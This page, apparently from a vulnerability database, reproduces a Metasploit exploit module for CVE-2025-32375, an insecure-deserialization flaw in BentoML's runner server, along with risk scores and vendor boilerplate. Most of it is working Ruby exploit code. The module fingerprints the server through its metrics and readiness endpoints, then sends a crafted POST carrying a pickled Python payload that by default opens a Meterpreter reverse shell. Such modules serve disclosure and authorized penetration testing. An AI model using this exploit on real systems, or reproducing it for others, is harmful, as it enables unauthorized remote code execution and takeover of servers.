Lucene search
K

BentoML's runner server RCE

🗓️ 23 Apr 2025 18:50:56Reported by SeaWind, Takahiro YokoyamaType 
metasploit
 metasploit
🔗 www.rapid7.com👁 356 Views

Insecure deserialization in BentoML runner server enables unauthorized code execution via parameters.

Related
Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'BentoML\'s runner server RCE',
        'Description' => %q{
          There was an insecure deserialization in BentoML's runner server prior to version 1.4.8.
          By setting specific headers and parameters in the POST request, it is possible to execute unauthorized arbitrary code in the context of the user running the server,
          which will grant initial access and information disclosure.
        },
        'Author' => [
          'SeaWind',          # Vulnerability discovery and PoC
          'Takahiro Yokoyama' # Metasploit module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2025-32375'],
          ['GHSA', '7v4r-c989-xh26', 'bentoml/BentoML']
        ],
        'Targets' => [
          [
            'Python payload',
            {
              'Arch' => ARCH_PYTHON,
              'Platform' => 'python',
              'Type' => :python,
              'DefaultOptions' => { 'PAYLOAD' => 'python/meterpreter/reverse_tcp' }
            }
          ],
          [
            'Linux Command', {
              'Arch' => [ ARCH_CMD ], 'Platform' => [ 'unix', 'linux' ], 'Type' => :nix_cmd,
              'DefaultOptions' => {
                # defaults to cmd/linux/http/aarch64/meterpreter/reverse_tcp
                'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp'
              }
            }
          ],
        ],
        'DefaultOptions' => {
          'FETCH_DELETE' => true
        },
        'DefaultTarget' => 0,
        'DisclosureDate' => '2025-04-09',
        'Notes' => {
          'Stability' => [ CRASH_SAFE, ],
          'SideEffects' => [ IOC_IN_LOGS ],
          'Reliability' => [ REPEATABLE_SESSION, ]
        }
      )
    )
    register_options(
      [
        Opt::RPORT(3000)
      ]
    )
  end

  def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'metrics')
    })
    return Exploit::CheckCode::Unknown('Unexpected server reply.') unless res&.code == 200
    return Exploit::CheckCode::Unknown('BentoML\'s runner server not detected.') unless res&.get_html_document&.text&.include?('bentoml_runner')

    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'readyz')
    })
    return Exploit::CheckCode::Unknown('BentoML\'s runner server not ready.') unless res&.code == 200

    Exploit::CheckCode::Detected("BentoML\'s runner server detected.")
    # Version check not available
  end

  def exploit
    if target['Type'] == :python
      pl = payload.encoded
    else
      pl = "import os;os.system(\"\"\"\n#{payload.encoded}\n\"\"\")"
    end

    send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path),
      'headers' => {
        'args-number' => '1',
        'Content-Type' => 'application/vnd.bentoml.pickled',
        'Payload-Container' => 'NdarrayContainer',
        'Payload-Meta' => '{"format": "default"}',
        'Batch-Size' => '-1'
      },
      'data' => Msf::Util::PythonDeserialization.payload(:py3_exec_threaded, pl)
    })
    # No response check here
  end

end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

08 Jul 2026 19:05Current
7.6High risk
Vulners AI Score7.6
CVSS 3.19.8
EPSS0.45773
SSVC
356